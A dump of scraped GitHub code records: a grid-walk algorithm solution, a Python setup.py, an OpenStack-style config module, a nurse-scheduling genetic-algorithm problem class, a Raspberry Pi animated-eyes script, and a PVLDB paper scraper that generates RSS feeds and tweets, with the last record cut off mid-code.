or temp_y2 > 20:\n continue\n else:\n pos[0] = temp_x2\n pos[1] = temp_y2\n if graph[temp_x1][temp_y1] == 0:\n graph[temp_x1][temp_y1] = 2\n \n for i in range(21):\n for j in range(21):\n if graph[i][j] == 2:\n count += 1\n \n return count","repo_name":"lololalayoho/Algo_share","sub_path":"20210308/방문 길이/programmers_방문길이.py","file_name":"programmers_방문길이.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9899225009","text":"# Sample setup.py for python package to publish to pypi\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"blitzactions\",\n version=\"0.0.1\",\n author=\"Rudra\",\n author_email=\"blitz04.dev@gmailc.com\",\n description=\"A package to test openai\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/BlitzJB/blitzactions\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=[\n 'openai',\n 'python-dotenv',\n ],\n)\n","repo_name":"BlitzJB/BlitzActions","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74329878180","text":"from oslo_config import cfg\nfrom oslo_db import options\nfrom oslo_log import log\n\nfrom daolicontroller.i18n import _\nfrom daolicontroller import paths\n\nCONF = cfg.CONF\n\n_DEFAULT_SQL_CONNECTION = 'sqlite:///' + paths.state_path_def('daoliproxy.sqlite')\n\n_DEFAULT_LOG_LEVELS = ['amqp=WARN', 'amqplib=WARN', 'boto=WARN',\n 'qpid=WARN', 'sqlalchemy=WARN', 'suds=INFO',\n 'oslo_messaging=INFO', 'iso8601=WARN',\n 'requests.packages.urllib3.connectionpool=WARN',\n 'urllib3.connectionpool=WARN', 'websocket=WARN',\n 'keystonemiddleware=WARN', 'routes.middleware=WARN',\n 'stevedore=WARN', 'glanceclient=WARN']\n\n_DEFAULT_LOGGING_CONTEXT_FORMAT = ('%(asctime)s.%(msecs)03d %(process)d '\n '%(levelname)s %(name)s [%(request_id)s '\n '%(user_identity)s] %(instance)s'\n '%(message)s')\n\n\n\ndef parse_args(argv, **kwargs):\n log.set_defaults(_DEFAULT_LOGGING_CONTEXT_FORMAT, _DEFAULT_LOG_LEVELS)\n log.register_options(CONF)\n options.set_defaults(CONF, connection=_DEFAULT_SQL_CONNECTION,\n sqlite_db='daolicontroller.sqlite')\n CONF(argv[1:],\n project='daolicontroller',\n version='1.0',\n **kwargs)\n","repo_name":"daolicloud/daolinet-openstack","sub_path":"daolicontroller/daolicontroller/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"19595343464","text":"import json\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils import solution_to_numpy, solution_to_list\n\n\nclass Problem:\n \"\"\"A problem class that loads from json file,\n handles visualization and evaluation of solutions.\"\"\"\n\n def __init__(self, file: str) -> None:\n self.file = file\n with open(file, \"r\", encoding=\"UTF-8\") as file:\n self.data = json.load(file)\n\n self.instance_name = self.data[\"instance_name\"]\n self.nbr_nurses = self.data[\"nbr_nurses\"]\n self.capacity_nurse = self.data[\"capacity_nurse\"]\n self.depot = self.data[\"depot\"]\n self.list_patients = self.data[\"patients\"]\n self.numpy_patients = self.list_patients_to_numpy(self.list_patients)\n # assumes id 1-len(patients) are used\n self.nbr_patients = len(self.numpy_patients)\n self.travel_times = np.asarray(self.data[\"travel_times\"])\n\n def list_patients_to_numpy(\n self, list_patients: dict[str, dict[str, int]]\n ) -> np.ndarray:\n \"\"\"Converts patients to numpy array.\"\"\"\n list_patients = [\n [\n patient[\"x_coord\"],\n patient[\"y_coord\"],\n patient[\"demand\"],\n patient[\"start_time\"],\n patient[\"end_time\"],\n patient[\"care_time\"],\n ]\n for patient in list_patients.values()\n ]\n return np.asarray(list_patients)\n\n def visualize_problem(self) -> None:\n \"\"\"Visualize the problem instance.\"\"\"\n # plot depot\n plt.scatter(self.depot[\"x_coord\"], self.depot[\"y_coord\"], c=\"r\")\n # plot patients\n for idx in range(1, self.nbr_patients):\n idx = str(idx)\n plt.scatter(\n self.list_patients[idx][\"x_coord\"],\n self.list_patients[idx][\"y_coord\"],\n c=\"b\",\n )\n plt.show()\n\n def visualize_solution(self, solution: list | np.ndarray) -> None:\n \"\"\"Visualize a solution.\n\n Args:\n solution (list | np.ndarray): Solution on either list on numpy format.\n \"\"\"\n\n if isinstance(solution, list):\n list_solution = solution\n else:\n list_solution = solution_to_list(solution)\n\n # plot depot\n plt.scatter(self.depot[\"x_coord\"], self.depot[\"y_coord\"], c=\"r\")\n # plot patients\n for idx in range(1, self.nbr_patients + 1):\n idx = str(idx)\n plt.scatter(\n self.list_patients[idx][\"x_coord\"],\n self.list_patients[idx][\"y_coord\"],\n c=\"b\",\n )\n # plot solution routes\n for nurse in list_solution:\n # add depot to start and end of route\n xs = [self.depot[\"x_coord\"]]\n ys = [self.depot[\"y_coord\"]]\n # add patients to route\n for patient in nurse:\n idx = str(patient)\n xs.append(self.list_patients[idx][\"x_coord\"])\n ys.append(self.list_patients[idx][\"y_coord\"])\n\n xs.append(self.depot[\"x_coord\"])\n ys.append(self.depot[\"y_coord\"])\n plt.plot(xs, ys)\n\n plt.show()\n\n def print_solution(\n self, solution: list | np.ndarray, fitness: float, is_valid: bool\n ) -> None:\n \"\"\"Prints a solution on the desired format.\n\n Args:\n solution (list | np.ndarray): Solution on either list on numpy format.\n \"\"\"\n\n if isinstance(solution, list):\n list_solution = solution\n # numpy_solution = solution_to_numpy(solution)\n else:\n list_solution = solution_to_list(solution)\n # numpy_solution = solution\n\n print()\n print(\"SOLUTION\")\n print(f\"Nurse capacity: {self.capacity_nurse}\")\n print()\n print(f\"Depot return time: {self.depot['return_time']}\")\n print(\"------------------------------------------------\")\n # check nurse path\n for nurse_idx, nurse_patients in enumerate(list_solution):\n # calculate used nurse capacity\n nurse_used_capacity = 0\n # calculate time\n tot_time = 0\n # add depot to start\n prev_spot_idx = 0\n # setup patient sequence, with start used demand used 0\n patient_sequence = [\"D(0)\"]\n # add patients to route\n for patient in nurse_patients:\n str_idx = str(patient)\n\n # get travel time\n travel_time = self.travel_times[prev_spot_idx, patient]\n tot_time += travel_time\n arrival_time = tot_time\n\n # check if time window is met\n # penalty is both added if arrival after end time and if service ends after end time\n if tot_time < self.list_patients[str_idx][\"start_time\"]:\n # wait until start time\n tot_time = self.list_patients[str_idx][\"start_time\"]\n\n # add service time\n tot_time += self.list_patients[str_idx][\"care_time\"]\n # add used capacity\n nurse_used_capacity += self.list_patients[str_idx][\"demand\"]\n\n # update prev spot\n prev_spot_idx = patient\n\n # add patient to sequence\n patient_visit_info = (\n f\"{patient} ({arrival_time:.2f}-{arrival_time + self.list_patients[str_idx]['care_time']:.2f})\"\n + f\" [{self.list_patients[str_idx]['start_time']:.2f}-{self.list_patients[str_idx]['end_time']:.2f}]\"\n )\n patient_sequence.append(patient_visit_info)\n # add current used demand\n patient_sequence.append(f\"D({nurse_used_capacity})\")\n\n print(\n f\"Nurse {nurse_idx}\"\n + f\" | {tot_time}\"\n + f\" | {nurse_used_capacity}\"\n + f\" | {patient_sequence}\"\n )\n # space inbetween nurses\n print()\n\n print(\"------------------------------------------------\")\n print(f\"Objective value (total duration): {fitness}\")\n print(f\"Valid solution: {is_valid}\")\n\n\nif __name__ == \"__main__\":\n from initializations import generate_random_genome\n from evaluations import evaluate\n\n problem = Problem(\"data/train_0.json\")\n print(f\"instance_name {problem.instance_name}\")\n print(f\"nbr_nurses {problem.nbr_nurses}\")\n print(f\"capacity_nurse {problem.capacity_nurse}\")\n print(f\"depot {problem.depot}\")\n print(f\"patients {problem.numpy_patients}\")\n print(f\"travel_times {problem.travel_times}\")\n print(f\"nbr_patients {problem.nbr_patients}\")\n print(f\"list_patients {problem.list_patients}\")\n print(f\"numpy_patients {problem.numpy_patients}\")\n\n sol = generate_random_genome(\n n_nurses=problem.nbr_nurses, n_patients=problem.nbr_patients\n )\n fitness, is_valid = evaluate(\n solution=sol,\n )\n problem.print_solution(sol, fitness, is_valid)\n problem.visualize_solution(sol)\n","repo_name":"SigmaDerivative/Nurse-Schedule-GA","sub_path":"python/problem_setup.py","file_name":"problem_setup.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37759081454","text":"#!/usr/bin/python\n# coding: utf8\n# Eyes Module\n# P20 Camila.Arias\n\nimport Adafruit_ADS1x15 \nimport argparse\nimport math\nimport pi3d\nimport random\nimport thread\nimport time\nimport RPi.GPIO as GPIO \nfrom svg.path import Path, parse_path\nfrom xml.dom.minidom import parse\nfrom gfxutil import *\n\n#---------- : controller OLED\nfrom controller import Controller\n\n\n# Set up display and initialize pi3d ---------------------------------------\n# Here ! dimensions change [Dimensions 128x4,128x2]\nDISPLAY = pi3d.Display.create(w=512,h=256,samples=4) \nDISPLAY.set_background(0, 0, 0, 1) # r,g,b,alpha\n\n# eyeRadius is the size, in pixels, at which the whole eye will be rendered\n# onscreen. eyePosition, also pixels, is the offset (left or right) from\n# the center point of the screen to the center of each eye. This geometry\n# is explained more in-depth in fbx2.c.\neyePosition = DISPLAY.width / 4\neyeRadius = 96 \n\n# A 2D camera is used, mostly to allow for pixel-accurate eye placement,\n# but also because perspective isn't really helpful or needed here, and\n# also this allows eyelids to be handled somewhat easily as 2D planes.\n# Line of sight is down Z axis, allowing conventional X/Y cartesion\n# coords for 2D positions.\ncam = pi3d.Camera(is_3d=False, at=(0,0,0), eye=(0,0,-1000))\nshader = pi3d.Shader(\"uv_light\")\nlight = pi3d.Light(lightpos=(0, -500, -500), lightamb=(0.2, 0.2, 0.2))\n\n# Layers configuration to obtain the 2D point list. Name of each layer is\n# the same as SVG image. \"id\": [numPoints,closedSurface ?,reverse ?]\nlayers = [(\"pupilMin\" ,32, True , True),\n (\"pupilMax\" ,32, True , True),\n (\"iris\" ,32, True , True),\n (\"scleraFront\" , 0, False, False),\n (\"scleraBack\" , 0, False, False),\n (\"upperLidClosed\" ,33, False, True),\n (\"upperLidOpen\" ,33, False, True) ,\n (\"upperLidEdge\" ,33, False, False),\n (\"lowerLidClosed\" ,33, False, False),\n (\"lowerLidOpen\" ,33, False, False),\n (\"lowerLidEdge\" ,33, False, False)]\n\ndom = parse(\"graphics/test.svg\")\nvb = getViewBox(dom)\npoints = []\nfor l in layers:\n #convert to point lists --------------------\n points.append(getPoints(dom,l[0],l[1],l[2],l[3]))\n # Transform point lists to eye dimensio\n scalePoints(points[-1],vb,eyeRadius)\n\n\n#Dictionary to obtain the number of layer\nto = { \"pupilMinPts\": 0,\n \"pupilMaxPts\": 1,\n \"irisPts\":2,\n \"scleraFrontPts\":3,\n \"scleraBackPts\":4,\n \"upperLidClosedPts\":5,\n \"upperLidOpenPts\" :6,\n \"upperLidEdgePts\":7,\n \"lowerLidClosedPts\":8,\n \"lowerLidOpenPts\":9,\n \"lowerLidEdgePts\":10 }\n\"\"\"\nClass representing an Eye\n\"\"\"\nclass Eye: \n\n\n def __init__(self,eyePosition,eyeRadius,id):\n global points,to\n self.eyePosition = eyePosition\n self.eyeRadius = eyeRadius\n #Load texture maps --------------------------------------------------------\n irisMap = pi3d.Texture(\"./graphics/iris.jpg\" , mipmap=False,\n filter=pi3d.GL_LINEAR)\n scleraMap = pi3d.Texture(\"./graphics/sclera.png\", mipmap=False,\n filter=pi3d.GL_LINEAR, blend=True)\n lidMap = pi3d.Texture(\"./graphics/lid.png\" , mipmap=False,\n filter=pi3d.GL_LINEAR, blend=True)\n #init iris\n self.iris = meshInit(32, 4, True, 0, 0.5/irisMap.iy, False)\n self.iris.set_textures([irisMap])\n self.iris.set_shader(shader) \n #init sclera\n self.eye = pi3d.Lathe(path=self.generate_sclera(eyeRadius), sides=64)\n self.eye.set_textures([scleraMap])\n self.eye.set_shader(shader) \n self.irisZ = zangle(points[to[\"irisPts\"]], eyeRadius)[0] * 0.99 # Get iris Z depth, for later\n #init upperlid\n self.upperEyelid = meshInit(33, 5, False, 0, 0.5/lidMap.iy, True)\n self.upperEyelid.set_textures([lidMap])\n self.upperEyelid.set_shader(shader)\n #init lowerlid\n self.lowerEyelid = meshInit(33, 5, False, 0, 0.5/lidMap.iy, True)\n self.lowerEyelid.set_textures([lidMap])\n self.lowerEyelid.set_shader(shader)\n #LEFT 0\n if id == 0:\n #init config if id (left id) is indicated\n self.eye.positionX(eyePosition)\n self.iris.positionX(eyePosition)\n self.upperEyelid.positionX(eyePosition)\n self.lowerEyelid.positionX(eyePosition)\n reAxis(self.eye, 0)\n else:\n #init right eye\n self.eye.positionX(-eyePosition)\n self.iris.positionX(-eyePosition)\n self.upperEyelid.positionX(-eyePosition)\n self.lowerEyelid.positionX(-eyePosition)\n reAxis(self.eye, 0.5)\n\n #initial position\n self.upperEyelid.positionZ(-eyeRadius - 42) \n self.lowerEyelid.positionZ(-eyeRadius - 42)\n self.irisRegenThreshold = self.get_iris_change()\n self.prevPupilScale = 0.5\n \n ##blinking\n self.luRegen = True\n self.prevLid = 0.5\n self.prevPts = pointsInterp(points[to[\"upperLidOpenPts\"]], points[to[\"upperLidClosedPts\"]],0.5)\n self.timeOfLastBlink = 0.0\n self.timeToNextBlink = 1.0\n self.trackingPos = 0.3\n self.blinkState = 0\n self.blinkDuration = 0.1\n self.blinkStartTime = 0\n self.limit = 0\n self.get_upper_limit()\n self.regenerate_iris(0.5)\n self.regenerate_upper_lid(0.4,True)\n self.regenerate_lower_lid(0.2)\n self.n = math.sqrt(900.0 - 15 * 15)\n\n #Define points of sclera \n def generate_sclera(self, eyeRadius):\n global points,to\n # Generate scleras for each eye...start with a 2D shape for lathing...\n angle1 = zangle(points[to[\"scleraFrontPts\"]], eyeRadius)[1] # Sclera front angle\n angle2 = zangle(points[to[\"scleraBackPts\"]], eyeRadius)[1] # \" back angle\n aRange = 180 - angle1 - angle2\n pts = []\n for i in range(24):\n ca, sa = pi3d.Utility.from_polar((90 - angle1) - aRange * i / 23)\n pts.append((ca * eyeRadius, sa * eyeRadius))\n return pts\n \n def get_iris_change(self):\n irisRegenThreshold = 0.0\n a = pointsBounds(points[to[\"pupilMinPts\"]]) # Bounds of pupil at min size (in pixels)\n b = pointsBounds(points[to[\"pupilMaxPts\"]]) # \" at max size\n maxDist = max(abs(a[0] - b[0]), abs(a[1] - b[1]), # Determine distance of max\n abs(a[2] - b[2]), abs(a[3] - b[3])) # variance around each edge\n # maxDist is motion range in pixels as pupil scales between 0.0 and 1.0.\n # 1.0 / maxDist is one pixel's worth of scale range. Need 1/4 that...\n if maxDist > 0: irisRegenThreshold = 0.25 / maxDist\n return irisRegenThreshold\n \n def get_upper_limit(self):\n p1 = points[to[\"upperLidOpenPts\"]][len(points[to[\"upperLidOpenPts\"]]) // 2]\n p2 = points[to[\"upperLidClosedPts\"]][len(points[to[\"upperLidClosedPts\"]]) // 2]\n dx = p2[0] - p1[0]\n dy = p2[1] - p1[1]\n d = dx * dx + dy * dy\n if d > 0: self.limit = 0.25 / math.sqrt(d)\n\n def regenerate_iris(self,p):\n global points,to\n # Interpolate points between min and max pupil sizes\n interPupil = pointsInterp(points[to[\"pupilMinPts\"]], points[to[\"pupilMaxPts\"]], p)\n # Generate mesh between interpolated pupil and iris bounds\n mesh = pointsMesh(None, interPupil, points[to[\"irisPts\"]], 4, -self.irisZ, True)\n # Assign to both eyes\n self.iris.re_init(pts=mesh)\n #return previous\n return p\n \n def regenerate_upper_lid(self,p,case):\n global points,to\n # Interpolate points between min and max pupil sizes\n interUpperNew = pointsInterp(points[to[\"upperLidOpenPts\"]], points[to[\"upperLidClosedPts\"]], p)\n # Generate mesh between interpolated pupil and iris bounds\n if case:\n mesh = pointsMesh(points[to[\"upperLidEdgePts\"]], self.prevPts,interUpperNew, 5, 0, False,True)\n else:\n mesh = pointsMesh(points[to[\"upperLidEdgePts\"]],interUpperNew,self.prevPts, 5, 0, False,True)\n\n #return previous\n self.upperEyelid.re_init(pts=mesh)\n self.prevPts = interUpperNew\n return p\n\n def regenerate_lower_lid(self,p):\n global points,to\n # Interpolate points between min and max pupil sizes\n interUpper = pointsInterp(points[to[\"lowerLidOpenPts\"]], points[to[\"lowerLidClosedPts\"]],0.5)\n interUpperNew = pointsInterp(points[to[\"lowerLidOpenPts\"]], points[to[\"lowerLidClosedPts\"]], p)\n # Generate mesh between interpolated pupil and iris bounds\n mesh = pointsMesh(points[to[\"lowerLidEdgePts\"]], interUpper,interUpperNew, 5, 0, False,True)\n #return previous\n self.lowerEyelid.re_init(pts=mesh)\n return p\n\n\n #______methods to visualize\n \n def draw(self):\n self.eye.draw()\n self.iris.draw()\n self.upperEyelid.draw()\n #self.lowerEyelid.draw()\n\n #Change iris's color\n def regenerate_map(self,color,p): \n self.iris.set_material(color)\n self.regenerate_iris(p)\n \n def frame(self,now): \n self.blink(now) \n \n def blink(self,now):\n #check final\n if (now - self.timeOfLastBlink) >= self.timeToNextBlink:\n self.timeOfLastBlink = now\n duration = 0.7 # Init duration\n if self.blinkState != 1:\n self.blinkState = 1\n self.blinkStartTime = now\n self.blinkDuration = duration\n self.timeToNextBlink = duration * 5 \n \n if self.blinkState:\n if (now - self.blinkStartTime) >= self.blinkDuration:\n self.blinkState += 1 \n if self.blinkState > 2:\n self.blinkState = 0 # NOBLINK \n else:\n self.blinkDuration *= 2.5\n self.blinkStartTime = now\n else:\n self.n = (now - self.blinkStartTime) / self.blinkDuration\n if self.n > 1.0: self.n = 1.0\n if self.blinkState == 2: self.n = 1.0 - self.n\n else:\n self.n = 0.0\n \n newLid = self.trackingPos + (self.n * (1.0 - self.trackingPos)) \n if (self.luRegen or (abs(newLid - self.prevLid) >= self.limit)):\n #is there any change?\n if newLid > self.prevLid:\n #change prevpts\n self.regenerate_upper_lid(newLid,True)\n else:\n #change prevpts\n self.regenerate_upper_lid(newLid,False)\n self.prevLid = newLid\n self.luRegen = True\n else:\n self.luRegen = False\n \n \n #Make a movement\n def rotate(self,curX,curY):\n self.iris.rotateToX(curY)\n self.iris.rotateToY(curX + 2)\n self.eye.rotateToX(curY) \n self.eye.rotateToY(curX + 2)\n \n\"\"\"\nClass representing EYES ANIMEES\n\n\"\"\"\nclass Eyes:\n\n\n def __init__(self):\n self.oled = Controller() #ACTIVE CODE C to controller OLED\n self.oled.open_OLED() #Active method\n self.right = Eye(eyePosition,eyeRadius,0.5)\n self.left = Eye(eyePosition,eyeRadius,0) \n #Variables to describe movement\n self.startTime = 0.0\n self. startX = random.uniform(-20.0, 20.0) \n self.startY = random.uniform(-20, 10)\n self.destX = self.startX\n self.destY = self.startY\n self.curX = self.startX\n self.curY = self.startY\n self.moveDuration = random.uniform(0.09, 0.2)\n self.holdDuration = random.uniform(0.5, 1.5)\n self.isMoving = False\n \n def draw(self):\n self.right.draw()\n self.left.draw()\n \n def color(self,color,p):\n self.right.regenerate_map(color,p)\n self.left.regenerate_map(color,p)\n \n def blink(self): \n DISPLAY.loop_running() \n now = time.time()\n self.left.frame(now) #calcul new frame \n self.right.frame(now) #calcul new frame\n self.move(now) #calcul new coordinates \n self.left.rotate(self.curX,self.curY) #Update X,Y\n self.right.rotate(self.curX,self.curY)\n self.draw()\n\n def move(self,now):\n dt = now - self.startTime\n # Autonomous eye position\n if self.isMoving == True:\n if dt <= self.moveDuration:\n scale = (now - self.startTime) / self.moveDuration\n scale = scale * scale\n self.curX = self.startX + (self.destX - self.startX) * scale\n self.curY = self.startY + (self.destY - self.startY) * scale\n else:\n self.startX = self.destX\n self.startY = self.destY\n self.curX = self.destX\n self.curY = self.destY\n self.holdDuration = random.uniform(0.5, 1.5)\n self.startTime = now\n self.isMoving = False\n else:\n if dt >= self.holdDuration:\n self.destX = random.uniform(-20.0, 20.0)\n self.n = math.sqrt(900.0 - self.destX * self.destX)\n self.destY = random.uniform(-20,10)\n self.moveDuration = random.uniform(0.09, 0.2)\n self.startTime = now\n self.isMoving = True\n\n def close(self):\n DISPLAY.stop()\n #---------------------close process to OLED\n self.oled.close_OLED()\n #-----------------------------------------\n exit(0)\n \n \n \n#--------------------------- TESTING CODE\n \nmykeys = pi3d.Keyboard() # For capturing key presse \nx = Eyes()\nwhile True:\n x.blink()\n k = mykeys.read()\n if k==27: \n x.close()\n mykeys.close()\n elif k == 97:\n x.color((1,0,0),1)\n elif k == 98:\n x.color((0,1,0),0.3)\n elif k == 99:\n x.color((0.5,0.5,0.5),0.5)\n \n \n\n\n\n\n\n\n","repo_name":"camila-ud/Pi_Eyes_module","sub_path":"eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":13681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7035717201","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport re\nimport urllib.request, urllib.parse, urllib.error\nimport logging\nimport pytz\nimport time\nimport argparse\nimport sqlite3\nfrom datetime import datetime\nfrom datetime import tzinfo\nfrom pprint import pprint, pformat\nfrom feedgen.feed import FeedGenerator\nfrom bs4 import BeautifulSoup\n\nfrom config import *\n\n## ==============================================\n## LOGGING\n## ==============================================\nLOG = logging.getLogger(__name__)\nLOG_handler = logging.StreamHandler()\nLOG_formatter = logging.Formatter(fmt='%(asctime)s [%(funcName)s:%(lineno)03d] %(levelname)-5s: %(message)s',\n datefmt='%m-%d-%Y %H:%M:%S')\nLOG_handler.setFormatter(LOG_formatter)\nLOG.addHandler(LOG_handler)\nLOG.setLevel(logging.INFO)\n\n\ndateRe = re.compile(\"Volume ([\\d]+), No\\.[\\s]?([\\d]+)\") # , ([A-Z][a-z]+ [\\d]{4})\")\n\nVOLUME_LABELS = { }\n\n## ==============================================\n## getVolumeUrls\n## ==============================================\ndef getVolumeUrls(url):\n volumes = [ ]\n \n # Brute force search for volumes\n for vol in range(15,16):\n url = START_URL % vol\n LOG.debug(\"Checking whether volume '%s' exists\" % url)\n try:\n r = urllib.request.urlopen(url).read()\n if not url in volumes:\n volumes.append(url)\n except:\n LOG.debug(\"Volume #%d does not exist. Skipping...\" % vol)\n pass\n ## FOR\n assert len(volumes) > 0 \n return volumes\n \n #soup = BeautifulSoup(r, \"lxml\")\n #regex = re.compile(\"\\/vol[\\d]+-volume-info\\.html\")\n #for a in soup.find_all('a'):\n #if not \"href\" in a.attrs:\n ## pprint(a.__dict__)\n #LOG.warn(\"No 'href' tag found. Skipping '%s'\" % str(a))\n #continue\n \n #m = regex.search(a[\"href\"])\n #if a[\"href\"].find(\"/pvldb/vol\") != -1:\n #pprint(a.__dict__)\n #pprint(m)\n #print(\"=\"*20)\n #if m and not a[\"href\"] in volumes:\n #if a[\"href\"] in SKIP:\n #LOG.warn(\"Skipping '%s'\" % a[\"href\"])\n #continue\n #volumes.append(a[\"href\"])\n ### FOR\n #assert len(volumes) > 0 \n #return [ BASE_URL + x for x in volumes ]\n## DEF\n\n## ==============================================\n## getPapersFromDiv\n## ==============================================\ndef getPapersFromDiv(volume, number, div):\n papers = [ ]\n paper_divs = div.find_all(class_=\"shadow-app\")\n if paper_divs is None:\n LOG.warn(\"Failed to find any papers in DIV '%s'\" % div.text)\n return papers\n\n for paper_div in paper_divs:\n data = [ ]\n # pprint(paper_div.__dict__)\n # print(\"=\"*100)\n\n try:\n # Pages, Authors\n results = paper_div.find_all('p')\n for element in results:\n # print(\"*\"*60)\n # pprint(element.__dict__)\n data.append(element.contents[0])\n ## FOR\n\n # Title\n results = paper_div.find_all('h5')\n for element in results:\n # print(\"*\"*60)\n # pprint(element.__dict__)\n data.append(element.contents[0])\n\n # Paper PDF URL\n results = paper_div.find_all('a')\n for element in results:\n url = element[\"href\"].replace(\"http:\", \"https:\")\n data.append(url)\n\n # print(\"%\"*30)\n # pprint(data)\n\n papers.append({\n \"authors\": data[1],\n \"title\": data[2],\n \"volume\": volume,\n \"number\": number,\n \"link\": data[3],\n \"published\": datetime.today().replace(tzinfo=pytz.utc),\n })\n LOG.debug(\"Found new paper for 'Vol:%d, Number:%d'\\n%s\", volume, number, pformat(papers[-1]))\n except:\n LOG.error(\"Unexpected error for 'Vol:%d, Number:%d' DIV\", volume, number)\n raise\n ## FOR\n return papers\n## DEF\n\n\n## ==============================================\n## getPapers\n## ==============================================\ndef getPapers(volume, vol_url):\n LOG.debug(\"Retreiving papers for %s\" % vol_url)\n\n html = None\n # with open(\"/tmp/pvldb.html\", \"r\") as fd:\n # html = fd.read()\n r = urllib.request.urlopen(vol_url).read()\n soup = BeautifulSoup(r, \"lxml\")\n\n number = 1\n papers = { }\n while True:\n LOG.debug(\"Looking for 'Vol:%d, Number:%d' DIV\", volume, number)\n div = soup.find('div', {\"id\": \"issue-%d\" % number})\n if not div:\n break\n\n key = (volume, number)\n papers[key] = getPapersFromDiv(volume, number, div)\n if len(papers[key]) > 0:\n LOG.debug(\"Found %d papers for 'Vol:%d, Number:%d'\\n%s\", len(papers[key]), volume, number, pformat(papers))\n\n number = number + 1\n ## WHILE\n return (papers)\n## DEF\n\n## ==============================================\n## writeRSS\n## ==============================================\ndef writeRSS(papers, output):\n fg = FeedGenerator()\n fg.id(RSS_URL)\n fg.title(RSS_TITLE)\n fg.subtitle(RSS_SUBTITLE)\n fg.author(RSS_AUTHOR)\n fg.link( href='http://www.vldb.org/pvldb/', rel='alternate' )\n fg.language('en')\n \n for p in papers:\n summary = \"%(title)s\\nAuthors: %(authors)s\\nPVLDB Volume %(volume)d, Number %(number)d\" % p\n \n fe = fg.add_entry()\n fe.author(name=p[\"authors\"])\n fe.title(p[\"title\"])\n fe.link(href=p[\"link\"]) \n fe.id(p[\"link\"])\n fe.published(published=p[\"published\"])\n fe.description(description=summary, isSummary=True)\n ## FOR\n \n atomfeed = fg.atom_str(pretty=True) # Get the ATOM feed as string\n atom_file = os.path.join(output, 'pvldb-atom.xml')\n fg.atom_file(atom_file) # Write the ATOM feed to a file\n LOG.info(\"Created ATOM '%s'\" % atom_file)\n \n rssfeed = fg.rss_str(pretty=True) # Get the RSS feed as string\n rss_file = os.path.join(output, RSS_FILE)\n fg.rss_file(rss_file) # Write the RSS feed to a file\n LOG.info(\"Created RSS '%s'\" % rss_file)\n## DEF\n\n## ==============================================\n## postTwitter\n## ==============================================\ndef postTwitter(args, db, paper):\n LOG.info(\"Posting paper '%s' to twitter!\" % paper[\"title\"])\n \n api = twitter.Api(consumer_key=args[\"twitter_consumer_key\"],\n consumer_secret=args[\"twitter_consumer_secret\"],\n access_token_key=args[\"twitter_access_token\"],\n access_token_secret=args[\"twitter_access_secret\"])\n \n #paper[\"separator\"] = u\"→\".encode('unicode-escape')\n \n tweet = \"Vol:%(volume)d No:%(number)d → %(title)s\" % paper\n if len(tweet)+24 > TWITTER_NUM_CHARS:\n remaining = TWITTER_NUM_CHARS - (len(tweet)+24)\n tweet = tweet[:remaining-3] + \"...\"\n tweet += \" \" + paper[\"link\"]\n \n LOG.debug(\"%s [Length=%d]\" % (tweet, len(tweet)))\n\n status = api.PostUpdate(tweet)\n LOG.info(\"Posted tweet [status=%s]\", str(status))\n \n cur = db.cursor()\n sql = \"UPDATE papers SET twitter = 1 WHERE link = ?\"\n cur.execute(sql, (paper[\"link\"], ))\n db.commit()\n \n## DEF\n\n\n## ==============================================\n## createDatabase\n## ==============================================\ndef createDatabase():\n db = sqlite3.connect(DB_PATH)\n cur = db.cursor()\n \n sql = \"\"\"\n CREATE TABLE papers (\n link VARCHAR(255) PRIMARY KEY,\n title TEXT NOT NULL,\n authors TEXT NOT NULL,\n volume INT NOT NULL,\n number INT NOT NULL,\n published DATE NOT NULL,\n twitter INT NOT NULL DEFAULT 0,\n created timestamp DEFAULT CURRENT_TIMESTAMP\n );\"\"\"\n cur.execute(sql)\n db.commit()\n db.close()\n \n## FOR\n\n\n## ==============================================\n## main\n## ==============================================\nif __name__ == '__main__':\n aparser = argparse.ArgumentParser(description='PVLDB Announcements Script')\n aparser.add_argument('dbpath', help='Database Path')\n aparser.add_argument(\"--debug\", action='store_true')\n\n ## Collection Parameters\n agroup = aparser.add_argument_group('Collection Parameters')\n agroup.add_argument('--collect', action='store_true', help='Collect results from PVLDB website')\n agroup.add_argument('--collect-start', type=int, help='Start volume to check')\n agroup.add_argument('--collect-stop', type=int, help='Stop volume to check (inclusive)')\n\n ## RSS Parameters\n agroup = aparser.add_argument_group('RSS Parameters')\n agroup.add_argument('--rss', action='store_true', help='Genereate RSS/Atom file')\n agroup.add_argument('--rss-path', type=str, help='RSS output directory')\n\n ## Twitter Parameters\n agroup = aparser.add_argument_group('RSS Parameters')\n agroup.add_argument('--twitter', action='store_true', help='Post announcements on Twitter')\n agroup.add_argument('--twitter-consumer-key', type=str, help='Twitter Consumer Key')\n agroup.add_argument('--twitter-consumer-secret', type=str, help='Twitter Consumer Secret')\n agroup.add_argument('--twitter-access-token', type=str, help='Twitter Access Token Key')\n agroup.add_argument('--twitter-access-secret', type=str, help='Twitter Access Token Secret')\n agroup.add_argument('--twitter-limit', type=int, help='Number of papers to announce before stopping')\n agroup.add_argument('--twitter-preference', type=str, help='Author ordering preference')\n \n args = vars(aparser.parse_args())\n\n ## ----------------------------------------------\n \n if args['debug']:\n LOG.setLevel(logging.DEBUG)\n\n # If they want to post to twitter, make sure they give us all the info\n # that we need to do this\n if args[\"twitter\"]:\n 